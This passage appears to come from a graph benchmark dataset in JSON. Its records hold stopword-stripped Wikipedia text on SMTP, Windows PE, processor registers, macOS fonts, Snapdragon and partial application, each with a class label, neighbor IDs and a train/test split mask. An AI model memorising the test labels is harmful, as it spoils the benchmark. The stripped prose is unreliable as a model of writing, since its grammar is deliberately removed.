exchange/outlook lotus notes/domino webmail clients may use either method retrieval protocol often formal standard smtp defines message transport message content thus defines mail envelope parameters envelope sender header except trace information body message std 10 define smtp envelope std 11 define message header body formally referred internet message format smtp connection-oriented text-based protocol mail sender communicates mail receiver issuing command strings supplying necessary data reliable ordered data stream channel typically transmission control protocol tcp connection smtp session consists commands originated smtp client initiating agent sender transmitter corresponding responses smtp server listening agent receiver session opened session parameters exchanged session may include zero smtp transactions smtp transaction consists three command/reply sequences besides intermediate reply data server reply either positive 2xx reply codes negative negative replies permanent 5xx codes transient 4xx codes reject permanent failure client send bounce message server received drop positive response followed message discard rather delivery initiating host smtp client either end-user email client functionally identified mail user agent mua relay server mail transfer agent mta smtp server acting smtp client relevant session order relay mail fully capable smtp servers maintain queues messages retrying message transmissions resulted transient failures mua knows outgoing mail smtp server configuration relay server typically determines server connect looking mx mail exchange dns resource record recipient domain name mx record found conformant relaying server instead looks record relay servers also configured use smart host relay server initiates tcp connection server well-known port smtp port 25 connecting msa port 587 main difference mta msa connecting msa requires smtp authentication smtp delivery protocol normal use mail pushed destination mail server next-hop mail server arrives mail routed based destination server individual user addressed protocols post office protocol pop internet message access protocol imap specifically designed use individual users retrieving messages managing mail boxes permit intermittently-connected mail server pull messages remote server demand smtp feature initiate mail queue processing remote server see remote message queue starting pop imap unsuitable protocols relaying mail intermittently-connected machines designed operate final delivery information critical correct operation mail relay mail envelope removed remote message queue starting feature smtp permits remote host start processing mail queue server may receive messages destined sending turn command feature however deemed insecure extended etrn command operates securely using authentication method based domain name system information email client needs know ip address initial smtp server given part configuration usually given dns name server deliver outgoing messages behalf user server administrators need impose control clients use server enables deal abuse example spam two solutions common use system isp smtp server allow access users outside isp network precisely server may allow access users ip address provided isp equivalent requiring connected internet using isp mobile user may often network normal isp find sending email fails configured smtp server choice longer accessible system several variations example organisation smtp server may provide service users network enforcing firewalling block access users wider internet server may perform range checks client ip address methods typically used corporations institutions universities provided smtp server outbound mail use internally within organisation however bodies use client authentication methods described user mobile may use different isps connect internet kind usage restriction onerous altering configured outbound email smtp server address impractical highly desirable able use email client configuration information need change modern smtp servers typically require authentication clients credentials allowing access rather restricting access location described earlier flexible system friendly mobile users allows fixed choice configured outbound smtp server smtp authentication often abbreviated smtp auth extension smtp order log using authentication mechanism server accessible wider internet enforce kinds access restrictions known open relay generally considered bad practice worthy blacklisting communication mail servers generally uses standard tcp port 25 designated smtp mail clients however generally n't use instead using specific submission ports mail services generally accept email submission clients one port 2525 others may used individual providers never officially supported internet service providers block outgoing port 25 traffic customers anti-spam measure reason businesses typically configure firewall allow outgoing port 25 traffic designated mail servers typical example sending message via smtp two mailboxes alice theboss located mail domain example.com localhost.com reproduced following session exchange example conversation parts prefixed c server client respectively labels part exchange message sender smtp client establishes reliable communications channel message receiver smtp server session opened greeting server usually containing fully qualified domain name fqdn case smtp.example.com client initiates dialog responding codice_1 command identifying command parameter fqdn address literal none available client notifies receiver originating email address message codice_2 command also return bounce address case message delivered example email message sent two mailboxes smtp server one recipient listed cc header fields corresponding smtp command codice_3 successful reception execution command acknowledged server result code response message e.g. 250 ok transmission body mail message initiated codice_4 command transmitted verbatim line line terminated end-of-data sequence sequence consists new-line cr lf single full stop period followed another new-line since message body contain line period part text client sends two periods every time line starts period correspondingly server replaces every sequence two periods beginning line single one escaping method called dot-stuffing server positive reply end-of-data exemplified implies server taken responsibility delivering message message doubled communication failure time e.g due power shortage sender received 250 reply must assume message delivered hand receiver decided accept message must assume message delivered thus time span agents active copies message try deliver probability communication failure occurs exactly step directly proportional amount filtering server performs message body often anti-spam purposes limiting timeout specified 10 minutes codice_5 command ends session email recipients located elsewhere client would codice_5 connect appropriate smtp server subsequent recipients current destination queued information client sends codice_1 codice_2 commands added seen example code additional header fields message receiving server adds codice_9 codice_10 header field respectively clients implemented close connection message accepted codice_11 last two lines may actually omitted causes error server trying send codice_12 reply original smtp protocol supported unauthenticated unencrypted ascii text communications susceptible man middle attacks spoofing spamming requiring encode binary data transmission number optional extensions specify various mechanisms address problems clients learn server supported options using codice_13 greeting exemplified instead original codice_1 example clients fall back codice_1 server support smtp extensions modern clients may use esmtp extension keyword codice_16 query server maximum message size accepted older clients servers may try transfer excessively sized messages rejected consuming network resources including connect time network links paid minute users manually determine advance maximum size accepted esmtp servers client replaces codice_1 command codice_13 command thus smtp2.example.com declares accept fixed maximum message size larger 14,680,064 octets 8-bit bytes simplest case esmtp server declares maximum codice_16 immediately receiving codice_13 according however numeric parameter codice_16 extension codice_13 response optional clients may instead issuing codice_2 command include numeric estimate size message transferring server refuse receipt overly-large messages original smtp supports transport textual data therefore binary data needs encoded text transfer decoded leading increased size transit 8bitmime command developed alleviate limitation standardized 1994 obsoleted 2011 corresponding new std 71 facilitates transparent exchange e-mail messages containing octets outside seven-bit ascii character set prior availability 8bitmime implementations mail user agents employed several techniques cope seven-bit limitation binary-to-text encodings including ones provided mime utf-7 however workarounds inflates required amount data transmission non-ascii text non-esmtp servers allowed sending 8-bit characters risky send data server whose 8-bit capabilities unknown on-demand mail relay odmr smtp extension standardized allows intermittently-connected smtp server receive email queued connected original smtp supports email addresses composed ascii characters inconvenient users whose native script latin based use diacritic ascii character set limitation alleviated via extensions enabling utf-8 address names introduced experimental codice_24 command later superseded introduced codice_25 command extensions provide support multi-byte non-ascii characters email addresses diacritics language characters greek chinese current support limited strong interest broad adoption related rfcs countries like china large user base latin ascii foreign script mail delivery occur plain text encrypted connections however communicating parties might know advance party ability use secure channel smtp authentication often abbreviated smtp auth describes mechanism client log using authentication mechanism supported server mainly used submission servers authentication mandatory multiple rfcs exist provide different variations mechanism update smtp extensions describe starttls command enables server tell client supports encrypted communications client request upgrade secure channel starttls effective passive observation attacks since starttls negotiation happens plain text active attacker trivially remove starttls command attack sometimes called striptls client would think server send starttls header support starttls server would think client respond starttls header thus support starttls note starttls also defined imap pop3 rfcs protocols serve different purposes smtp used communication message transfer agents imap pop3 end clients message transfer agents electronic frontier foundation maintains starttls everywhere list similarly https everywhere list allows relying parties discover others supporting secure communication without prior communication newer 2018 called smtp mta strict transport security mta-sts aims addresses problem active adversary defining protocol mail servers declare ability use secure channels specific files server specific dns txt records relying party would regularly check existence record cache amount time specified record never communicate insecure channels record expires note mta-sts records apply smtp traffic mail servers communications end client mail server protected http strict transport security https april 2019 google mail announced support mta-sts number protocols allows secure delivery messages fail due misconfigurations deliberate active interference leading undelivered messages delivery unencrypted unauthenticated channels smtp tls reporting describes reporting mechanism format sharing statistics specific information potential failures recipient domains recipient domains use information detect potential attacks diagnose unintentional misconfigurations april 2019 google mail announced support smtp tls reporting original design smtp facility authenticate senders check servers authorized send behalf result email spoofing possible commonly used email spam phishing occasional proposals made modify smtp extensively replace completely one example internet mail 2000 neither made much headway face network effect huge installed base classic smtp instead mail servers use range techniques including domainkeys identified mail sender policy framework dmarc dnsbls greylisting reject quarantine suspicious emails",
    "neighbors": [
      10242,
      11269,
      1030,
      10248,
      8202,
      10254,
      9233,
      8211,
      9747,
      6681,
      6682,
      5659,
      10269,
      10271,
      8224,
      6177,
      6689,
      9251,
      2596,
      2085,
      10786,
      7208,
      44,
      7214,
      3631,
      6704,
      8238,
      562,
      1075,
      1586,
      2101,
      4660,
      5685,
      9269,
      11321,
      5179,
      3133,
      574,
      1086,
      64,
      3645,
      5181,
      4163,
      6723,
      8766,
      11332,
      10824,
      8265,
      76,
      9292,
      4687,
      11345,
      1618,
      6231,
      7255,
      3673,
      2656,
      9824,
      1125,
      10341,
      10344,
      5225,
      6762,
      10861,
      5230,
      3695,
      10866,
      4723,
      6261,
      2679,
      119,
      3703,
      1658,
      4729,
      11387,
      11390,
      1664,
      5249,
      5250,
      5251,
      7812,
      8837,
      9860,
      649,
      9868,
      2701,
      8337,
      3218,
      8341,
      9365,
      11413,
      152,
      11414,
      10906,
      11418,
      2206,
      3742,
      9380,
      3237,
      9381,
      3751,
      3752,
      172,
      10924,
      6318,
      2736,
      4272,
      9909,
      4793,
      7865,
      1211,
      2748,
      4797,
      702,
      8386,
      7364,
      8905,
      5835,
      10956,
      1229,
      5843,
      9939,
      7895,
      6363,
      10461,
      10462,
      7391,
      3297,
      2274,
      3813,
      9451,
      11500,
      2797,
      751,
      2800,
      8432,
      8946,
      5875,
      9459,
      10486,
      3322,
      7930,
      8443,
      10490,
      11515,
      9986,
      9987,
      5892,
      3847,
      3344,
      1297,
      4883,
      10005,
      3350,
      5402,
      8474,
      5405,
      5407,
      10530,
      11046,
      9511,
      5421,
      7984,
      10033,
      10035,
      3894,
      8504,
      5433,
      2362,
      9532,
      829,
      5437,
      10748,
      2373,
      2375,
      2887,
      10058,
      334,
      5968,
      849,
      6993,
      1876,
      6996,
      6997,
      4439,
      2904,
      7003,
      6492,
      5469,
      5470,
      5471,
      5472,
      8541,
      10589,
      1893,
      3941,
      871,
      3944,
      361,
      11112,
      367,
      6000,
      5492,
      6517,
      9588,
      3959,
      891,
      6523,
      6524,
      7036,
      2431,
      11647,
      10115,
      904,
      3465,
      4490,
      11147,
      6541,
      9616,
      7570,
      6035,
      5531,
      412,
      1436,
      10144,
      929,
      10659,
      9124,
      933,
      2983,
      4009,
      9642,
      8622,
      6577,
      2996,
      10167,
      5048,
      10171,
      6588,
      3006,
      9151,
      1472,
      8640,
      8130,
      8132,
      9670,
      3015,
      5063,
      10184,
      3018,
      10696,
      11210,
      2509,
      11218,
      3539,
      471,
      472,
      988,
      3549,
      8669,
      8670,
      10723,
      5093,
      10727,
      3564,
      10226,
      9720,
      3578,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 9910,
    "label": 2,
    "text": "Windows_Preinstallation_Environment:windows preinstallation environment windows preinstallation environment also known windows pe winpe lightweight version windows used deployment pcs workstations servers troubleshooting operating system offline intended replace ms-dos boot disks booted via usb flash drive pxe ipxe cd-rom hard disk traditionally used large corporations oems preinstall windows client operating systems pcs manufacturing widely available free charge via windows automated installation kit waik winpe originally intended used pre-installation platform deploying microsoft windows operating systems specifically replace dos respect winpe following uses package used developer testing recovery cd/dvd system administrators many customized winpe boot cds packaged third-party applications different uses available volunteers via internet package also used base forensics investigation either capture disk image run analysis tools without mounting available disks thus changing state version 2.0 introduced number improvements extended availability winpe customers corporate enterprise customers downloading installing microsoft windows automated installation kit waik originally designed built small team engineers microsoft windows deployment team including vijay jayaseelan ryan burkhardt richard bond following versions known exist windows recovery environment winre set tools based windows pe help diagnose recover serious errors may preventing windows booting successfully windows installed along windows vista later may booted hard disks optical media operating system installation disc pxe e.g windows deployment services copy windows included installation media aforementioned operating systems successor recovery console windows features include starting windows server 2012 following additional options added windows 10 adds following volumes encrypted bitlocker mounted recovery key available windows recovery environment also installed hard drive partition oems customized additional tools separate system recovery tool restoring computer back original state windows vista sp1 users create bootable cd containing recovery environment microsoft diagnostics recovery toolset dart sold part microsoft desktop optimization pack yet another toolset based windows pe performs diagnostic recovery offline copy windows manage files edit windows registry uninstall previously installed windows updates scan system malware restore deleted files",
    "neighbors": [
      2568,
      11283,
      4637,
      9762,
      11301,
      6697,
      1581,
      582,
      1098,
      7754,
      10839,
      8798,
      10338,
      8296,
      5225,
      11368,
      8299,
      7796,
      6265,
      8315,
      636,
      1150,
      639,
      641,
      651,
      6797,
      10896,
      9874,
      2196,
      10900,
      6297,
      7840,
      9377,
      4771,
      2213,
      3250,
      5300,
      6340,
      10957,
      3289,
      4316,
      6371,
      9448,
      10989,
      3314,
      5363,
      2811,
      8976,
      3857,
      9505,
      6441,
      3890,
      1337,
      6462,
      321,
      11605,
      2391,
      11103,
      2919,
      8576,
      3463,
      1418,
      8080,
      7057,
      4505,
      4515,
      3496,
      7081,
      7615,
      7106,
      9166,
      9173,
      5600,
      6114,
      4074,
      9709,
      5103
    ],
    "mask": "None"
  },
  {
    "node_id": 9911,
    "label": 3,
    "text": "Processor_register:processor register computer architecture processor register quickly accessible location available computer central processing unit cpu registers usually consist small amount fast storage although registers specific hardware functions may read-only write-only registers typically addressed mechanisms main memory may cases assigned memory address e.g dec pdp-10 ict 1900 almost computers whether load/store architecture load data larger memory registers used arithmetic operations manipulated tested machine instructions manipulated data often stored back main memory either instruction subsequent one modern processors use either static dynamic ram main memory latter usually accessed via one cache levels processor registers normally top memory hierarchy provide fastest way access data term normally refers group registers directly encoded part instruction defined instruction set however modern high-performance cpus often duplicates architectural registers order improve performance via register renaming allowing parallel speculative execution modern x86 design acquired techniques around 1995 releases pentium pro cyrix 6x86 nx586 amd k5 common property computer programs locality reference refers accessing values repeatedly holding frequently used values registers improve performance makes fast registers caches meaningful allocating frequently used variables registers critical program performance register allocation performed either compiler code generation phase manually assembly language programmer registers normally measured number bits hold example 8-bit register 32-bit register 64-bit register even instruction sets registers operate various modes breaking storage memory smaller ones 32-bit four 8-bit one instance multiple data vector one dimensional array data loaded operated upon time typically implemented adding extra registers map memory bigger one processors ability execute single instruction multiple data called vector processors processor often contains several kinds registers classified according content instructions operate hardware registers similar occur outside cpus architectures sparc mips first last register integer register file pseudo-register way hardwired always return zero read mostly simplify indexing modes overwritten alpha also done floating-point register file result register files commonly quoted one register many actually usable example 32 registers quoted 31 fit within definition register following table shows number registers several mainstream cpu architectures note x86-compatible processors stack pointer esp counted integer register even though limited number instructions may used operate contents similar caveats apply architectures although listed architectures different almost basic arrangement known von neumann architecture first proposed hungarian-american mathematician john von neumann also noteworthy number registers gpus much higher cpus number registers available processor operations performed using registers significant impact efficiency code generated optimizing compilers strahler number expression tree gives minimum number registers required evaluate expression tree",
    "neighbors": [
      4098,
      1029,
      7173,
      9739,
      8716,
      4112,
      2066,
      7699,
      5655,
      4121,
      10779,
      8732,
      10781,
      10786,
      6181,
      2599,
      8231,
      3630,
      4144,
      6705,
      7218,
      8761,
      2620,
      2623,
      2113,
      7234,
      2115,
      8773,
      3142,
      585,
      74,
      2638,
      1103,
      7760,
      2647,
      602,
      7770,
      604,
      3164,
      5725,
      1122,
      7269,
      3175,
      7783,
      8301,
      8815,
      7281,
      5234,
      9331,
      630,
      8822,
      2682,
      1660,
      3197,
      6268,
      11390,
      3203,
      10383,
      7313,
      7316,
      663,
      6296,
      9368,
      7323,
      6815,
      8352,
      5793,
      6818,
      8868,
      6821,
      682,
      7852,
      9391,
      2224,
      2226,
      7858,
      4276,
      11447,
      8890,
      4286,
      2241,
      2243,
      9932,
      5326,
      5329,
      4821,
      10966,
      731,
      11487,
      2277,
      5862,
      7911,
      9445,
      10985,
      5354,
      5356,
      9964,
      2798,
      5358,
      1776,
      5872,
      8944,
      757,
      2805,
      10485,
      249,
      3321,
      8700,
      7421,
      1791,
      255,
      8447,
      8450,
      5380,
      1798,
      8966,
      1801,
      5897,
      9996,
      10508,
      6926,
      6415,
      9489,
      786,
      1298,
      4884,
      7445,
      11539,
      8474,
      5922,
      2339,
      5412,
      10533,
      6950,
      5415,
      11050,
      3886,
      7471,
      10746,
      309,
      8501,
      5948,
      4928,
      833,
      8514,
      9028,
      4423,
      10571,
      6476,
      1869,
      8012,
      2383,
      7505,
      9044,
      11604,
      344,
      2394,
      6495,
      1376,
      8543,
      6502,
      6503,
      10603,
      11630,
      8048,
      4465,
      10098,
      372,
      10612,
      1399,
      2937,
      1402,
      1915,
      7033,
      8060,
      9599,
      3457,
      9095,
      398,
      3470,
      5518,
      8078,
      5523,
      407,
      409,
      1952,
      10658,
      3493,
      9126,
      936,
      427,
      2987,
      10669,
      7086,
      1967,
      2480,
      5040,
      10675,
      1461,
      1462,
      1463,
      4534,
      7607,
      8120,
      5051,
      8125,
      4030,
      8126,
      1985,
      3010,
      6084,
      453,
      3014,
      6596,
      9668,
      6607,
      8143,
      10703,
      466,
      2517,
      10199,
      473,
      1499,
      3547,
      477,
      1502,
      7134,
      5090,
      995,
      7653,
      10725,
      9707,
      10734,
      6639,
      499,
      4596,
      2039,
      8186,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 9912,
    "label": 2,
    "text": "List_of_typefaces_included_with_macOS:list typefaces included macos list fonts contains every font shipped mac os x 10.0 macos 10.14 including shipped language-specific updates apple primarily korean chinese fonts fonts shipped mac os x 10.5 please see apple documentation following system fonts added yosemite least following system fonts added el capitan least following system fonts added sierra high sierra added several system fonts additional weights existing system fonts new fonts provided mojave number fonts also provided imovie ilife idvd apple applications hidden folders sole use applications reason fonts hidden unknown licensing issues suggested cause however may easily installed use applications copying library directories installing third-party font notable hidden fonts macos include bank gothic bodoni century gothic century schoolbook garamond several cuts lucida monotype twentieth century",
    "neighbors": [
      11521,
      2819,
      1796,
      7171,
      3719,
      4615,
      10888,
      11402,
      9100,
      5647,
      10512,
      1042,
      9109,
      1686,
      7318,
      3228,
      11037,
      2207,
      1439,
      1699,
      166,
      811,
      3371,
      5292,
      1710,
      6700,
      8877,
      4657,
      1074,
      10036,
      3766,
      2232,
      9529,
      11257,
      9406,
      10432,
      1729,
      6849,
      4933,
      713,
      9418,
      9035,
      9802,
      6093,
      3790,
      7118,
      5713,
      1878,
      3670,
      4184,
      3289,
      3035,
      4571,
      2141,
      4318,
      4702,
      4068,
      2149,
      5093,
      487,
      231,
      4457,
      9451,
      10221,
      8303,
      2288,
      5619,
      2676,
      6771,
      7928,
      8441,
      7163,
      8701,
      7422,
      9343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9913,
    "label": 3,
    "text": "Qualcomm_Snapdragon:qualcomm snapdragon snapdragon suite system chip soc semiconductor products mobile devices designed marketed qualcomm technologies inc snapdragon central processing unit cpu uses arm risc instruction set single soc may include multiple cpu cores adreno graphics processing unit gpu snapdragon wireless modem hexagon digital signal processor dsp qualcomm spectra image signal processor isp software hardware support smartphone global positioning system gps camera video audio gesture recognition ai acceleration snapdragon semiconductors embedded devices various systems including android windows phone netbooks also used cars wearable devices devices addition processors snapdragon line includes modems wi-fi chips mobile charging products first snapdragon product made available consumer device manufacturers qsd8250 released december 2007 included first 1 ghz processor mobile phones qualcomm introduced krait microarchitecture second generation snapdragon socs 2011 allowing processor core adjust speed based device needs 2013 consumer electronics show qualcomm introduced first snapdragon 800 series renamed prior models 200 400 600 series several new iterations introduced since snapdragon 805 810 615 410 qualcomm re-branded modem products snapdragon name december 2014. asus hp lenovo begun selling laptops snapdragon-based cpus running windows 10 name always connected pcs marking entry pc market qualcomm arm architecture qualcomm announced developing scorpion central processing unit cpu november 2007 snapdragon system chip soc announced november 2006 included scorpion processor well semiconductors also included qualcomm first custom hexagon digital signal processor dsp according qualcomm spokesperson named snapdragon snap dragon sounded fast fierce following month qualcomm acquired airgo networks undisclosed amount said airgo 802.11a/b/g 802.11n wi-fi technology would integrated snapdragon product suite early versions scorpion processor core design similar cortex-a8 first snapdragon shipments qsd8250 november 2007 according cnet snapdragon claim fame first 1 ghz mobile processor smartphones time using 500 mhz processors first generation snapdragon products supported 720p resolution 3d graphics 12-megapixel camera november 2008 15 device manufacturers decided embed snapdragon semiconductors consumer electronics products november 2008 qualcomm announced would also compete intel netbook processor market dual-core snapdragon system-on-chips planned late 2009 demonstrated snapdragon processor consumed less power intel chips announced around time claimed would also cost less released month qualcomm introduced snapdragon-based prototype netbook called kayak used 1.5 ghz processors intended developing markets may 2009 java se ported optimized snapdragon november 2009 computex taipei show qualcomm announced qsd8650a addition snapdragon product suite based 45 nanometer manufacturing processes featured 1.2 ghz processor lower power consumption prior models late 2009 smartphone manufacturers announced would using snapdragon socs acer liquid metal htc hd2 toshiba tg01 sony ericsson xperia x10 lenovo announced first netbook product using snapdragon socs december according pc world mobile devices using snapdragon better battery life smaller size using socs june 2010 snapdragon chips embedded 20 available consumer devices incorporated 120 product designs development apple dominant market position smartphones time incorporate snapdragon products success snapdragon therefore relied competing android phones google nexus one htc incredible challenging apple market position android devices end taking market share iphone predominantly used snapdragon unconfirmed widely circulated report speculating apple going start using snapdragon socs verizon-based iphones 2012 apple still using ax semiconductor designs support windows phone 7 operating systems added snapdragon october 2010 2011 snapdragon embedded hewlett packard webos devices 50 market share 7.9 billion smartphone processor market 2012 snapdragon s4 krait core taken dominant share android system-on-chips like nvidia tegra texas instruments omap caused latter exit market july 2014 market share android phones grown 84.6 percent qualcomm snapdragon chips embedded 41 smartphones however september 2013 debut apple 64-bit a7 chip iphone 5s forced qualcomm release competing 64-bit product despite capable performance snapdragon 800/801/805 since existing krait cores 32-bit first 64-bit socs snapdragon 808 810 rushed market using generic cortex-a57 cortex-a53 cores suffered overheating problems throttling particularly 810 led samsung stop using snapdragon galaxy s6 flagship phone galaxy note 5 phablet snapdragon chips also used android-based smartwatches snapdragon products also used virtual reality products vehicles like maserati quattroporte cadillac xts applications june 2010 qualcomm began sampling third generation snapdragon products two dual-core 1.2 ghz system chips soc called mobile station modem msm 8260 8660 8260 gsm umts hspa+ networks 8660 cdma2000 evdo networks november qualcomm announced msm8960 lte networks early 2011 qualcomm announced new processor architecture called krait used arm v7 instruction set based qualcomm processor design processors called s4 feature named asynchronous symmetrical multi-processing asmp meaning processor core adjusted clock speed voltage based device activity order optimize battery usage prior models renamed s1 s2 s3 distinguish generation s4-based generation snapdragon socs began shipping product manufacturers msm8960 february 2012 benchmark tests anandtech msm8960 better performance processor tested overall system benchmark 8960 obtained score 907 compared 528 658 galaxy nexus htc rezound respectively quadrant benchmark test assesses raw processing power dual-core krait processor score 4,952 whereas quad-core tegra 3 4,000 quad-core version apq8064 made available july 2012 first snapdragon soc use qualcomm adreno 320 graphics processing unit gpu adoption snapdragon contributed qualcomm transition wireless modem company one also produces wider range hardware software mobile devices july 2011 qualcomm acquired certain assets gesturetek order incorporate gesture recognition intellectual property snapdragon socs mid-2012 qualcomm announced snapdragon software development kit sdk android devices uplinq developer conference sdk includes tools facial recognition gesture recognition noise cancellation audio recording november qualcomm acquired assets epos development order integrate stylus gesture recognition technology snapdragon products also collaborated microsoft optimize windows phone 8 snapdragon semiconductors 2012 snapdragon s4 krait core taken dominant share android system-on-chips like nvidia tegra texas instruments omap caused latter exit market july 2014 market share android phones grown 84.6 percent qualcomm snapdragon chips powered 41 smartphones however september 2013 debut apple 64-bit a7 chip iphone 5s forced qualcomm rush competing 64-bit solution despite capable performance snapdragon 800/801/805 since existing krait cores 32-bit first 64-bit socs snapdragon 808 810 rushed market using generic cortex-a57 cortex-a53 cores suffered overheating problems throttling particularly 810 led samsung ditching snapdragon galaxy s6 flagship phone entry-level 200 series expanded six new processors using 28 nanometer manufacturing dual quad-core options june 2013 entry-level snapdragon 210 intended low-cost phones announced september 2014 qualcomm first attempt 64-bit system chip created new in-house architecture later models showed better thermal performance especially compared snapdragon models launched 2015 like snapdragon 820 early 2016 qualcomm launched snapdragon 820 arm 64-bit quad-core processor using in-house designed kryo cores qualcomm launched updated snapdragon 821 later year higher clock speeds slightly better performance snapdragon 820 family uses samsung 14-nanometer finfet process qualcomm also released qualcomm snapdragon neural processing engine sdk first ai acceleration smartphones qualcomm announced octa-core snapdragon 835 soc november 17 2016 released following year used kryo 280 cores built using samsung 10-nanometer finfet process initial launch due samsung role manufacturing chip mobile division also acquired initial inventory chip means phone maker able manufacture products containing snapdragon 835 samsung released flagship device year galaxy s8 computex 2017 may qualcomm microsoft announced plans launch snapdragon-based laptops running windows 10 partnered hp lenovo asus release slim portables 2-in-1 devices powered snapdragon 835 december 2017 qualcomm announced octa-core snapdragon 845 uses 10-nanometer manufacturing process earlier snapdragon 835 introduced new processor architecture kryo 385 designed better battery life photography use artificial intelligence apps early 2018 qualcomm introduced 7 series sits 6 8 series terms pricing performance 700 launched octa-core models snapdragon 710 712 using kryo 360 processor architecture built 10-nanometer manufacturing process following year 2019 qualcomm released new variants mobile processors snapdragon 855 replacing 845 snapdragon 855 competes high end system chip solutions like apple a12 kirin 980 snapdragon 855 features kryo 485 cores built tsmc 7-nanometer process along snapdragon 730 730g replacing 710 712 newer 730 730g feature kryo 460 cores built samsung 8-nanometer process snapdragon system chip products typically include graphics processing unit gpu global positioning system gps cellular modem integrated single package software included operates graphics video picture-taking 19 different snapdragon processors 400 600 800 product families spanning low high-end respectively well wi-fi mobile charging products components include adreno graphics processing qualcomm hexagon dsp processors using qualcomm s4 processor architecture addition smartphones 400 series used smart watches 602a intended electronics cars current snapdragon naming scheme implemented snapdragon 800 family announced 2013 consumer electronics show prior models renamed 200 400 600 series new snapdragon 600 also released mid-year embedded new android devices 400 family entry-level 600 mass-market mid-range 800 family high-end flagship phones snapdragon 805 released november 410 intended low-cost phones developing nations announced following month january 2014 qualcomm introduced modified version snapdragon 600 called 602a intended in-car infotainment screens backup cameras driver assistance products quad-core snapdragon 610 eight-core 615 announced february 2014 snapdragon 808 810 announced april 2014 snapdragon 835 announced november 2017 first qualcomm soc built 10 nm architecture qualcomm new flagship chip 2018 845 announced december 2017 according qualcomm 845 25-30 faster 835 february 2015 qualcomm re-branded stand-alone modem products snapdragon name distinguished socs using x designation x7 x12 modem first snapdragon modem 5g networks x50 announced late 2016 followed 2gbs x24 modem 7 nanometer manufacturing process announced february 2018 according cnet phones growing us market share ranked highly cnet reviews due responsiveness snapdragon socs also used windows phones phones entering market mid-2013 lg g2 first phone market using snapdragon 800 august 2013 2017 660 630 replaced 653 626 mid-range models several chips 400 product family revved february 2017 qualcomm introduced snapdragon x20 intended 5g cell phone networks two new chips 802.11ax commercial wi-fi networks followed addition 636 600 product family october qualcomm said would 40 percent faster 630 august 2018 snapdragon 632 439 429 released new soc aimed mid-range devices moto g6 play huawei honor 7a nokia 5 december 2018 qualcomm announced 8cx snapdragon tech summit 2018 8cx qualcomm first soc specifically designed always connected pc acpc platform unlike qualcomm past acpc socs respective mobile socs higher tdp qualcomm also showcased snapdragon x50 5g modem snapdragon 855 qtm052 mmwave antenna module february 2019 qualcomm announced snapdragon x55 5g modem qtm525 mmwave antenna module qet6100 envelope tracker new qat3555 antenna impedance tuner benchmark tests snapdragon 800 processor pc magazine found processing power comparable similar products nvidia benchmarks snapdragon 805 found adreno 420 gpu resulted 40 percent improvement graphics processing adreno 330 snapdragon 800 though slight differences processor benchmarks benchmarks snapdragon 801 inside htc one found bump around benchmark improvements 800 2015 samsung decision use snapdragon 810 galaxy s6 significant detrimental impact snapdragon revenues reputation benchmark tests ars technica confirmed rumors 810 under-performed lower-end models overheating issues qualcomm spokesperson said tests done early versions 810 n't ready commercial use updated version released found moderately improve thermal throttling gpu clock speeds memory latency memory bandwidth tested commercial product xiaomi mi note pro additionally 820/821 835 845 performed substantially better qualcomm led industry sustained gpu performance perf/w release 820 release apple a12",
    "neighbors": [
      3585,
      7170,
      8196,
      8719,
      4624,
      8720,
      11282,
      9235,
      11289,
      4124,
      9244,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      5681,
      8250,
      8253,
      7745,
      7234,
      7235,
      7747,
      2635,
      5721,
      99,
      8812,
      11374,
      10361,
      6268,
      638,
      644,
      4228,
      10884,
      9863,
      11396,
      8842,
      5262,
      146,
      659,
      1170,
      1682,
      7833,
      666,
      5786,
      7835,
      2208,
      4258,
      4773,
      9391,
      9913,
      9405,
      8383,
      10945,
      194,
      196,
      9928,
      2258,
      4821,
      8919,
      10971,
      2788,
      3301,
      6884,
      5356,
      9964,
      1776,
      6391,
      3835,
      2814,
      2308,
      5892,
      781,
      6925,
      6415,
      4890,
      9498,
      5417,
      2862,
      7988,
      10548,
      11062,
      1849,
      6971,
      6978,
      8003,
      10562,
      6981,
      3911,
      11080,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      9581,
      11629,
      6001,
      2420,
      373,
      8058,
      392,
      398,
      1428,
      4508,
      10658,
      5028,
      7077,
      9638,
      2993,
      10675,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      10725,
      3562,
      10223,
      499,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 9914,
    "label": 9,
    "text": "Partial_application:partial application computer science partial application partial function application refers process fixing number arguments function producing another function smaller arity given function formula_1 might fix 'bind first argument producing function type formula_2 evaluation function might represented formula_3 note result partial function application case function takes two arguments partial application sometimes incorrectly called currying related distinct concept intuitively partial function application says fix first arguments function get function remaining arguments example function div x x div parameter x fixed 1 another function div div 1 1/y function inv returns multiplicative inverse argument defined inv 1/ practical motivation partial application often functions obtained supplying arguments function useful example many languages function operator similar codice_1 partial application makes easy define functions example creating function represents addition operator 1 bound first argument languages ml haskell functions defined curried form default supplying fewer total number arguments referred partial application languages first-class functions one define codice_2 codice_3 codice_4 perform currying partial application explicitly might incur greater run-time overhead due creation additional closures haskell use efficient techniques scala implements optional partial application placeholder e.g returns incrementing function scala also support multiple parameter lists currying e.g clojure implements partial application using codice_5 function defined core library c++ standard library provides codice_6 return function object result partial application given arguments given function java codice_7 partially applies function first argument perl 6 codice_8 method creates new function fewer parameters python standard library module codice_9 includes codice_5 function allowing positional named argument bindings returning new function xquery argument placeholder codice_11 used non-fixed argument partial function application simply-typed lambda calculus function product types λ partial application currying uncurrying defined note codice_2 codice_4 codice_2",
    "neighbors": [
      4769,
      3876,
      5031,
      6775,
      7386,
      8554,
      5677,
      11610,
      1936,
      10581,
      5783,
      10616,
      3705,
      6074,
      5917
    ],
    "mask": "Test"
  },
  {
    "node_id": 9915,
    "label": 9,
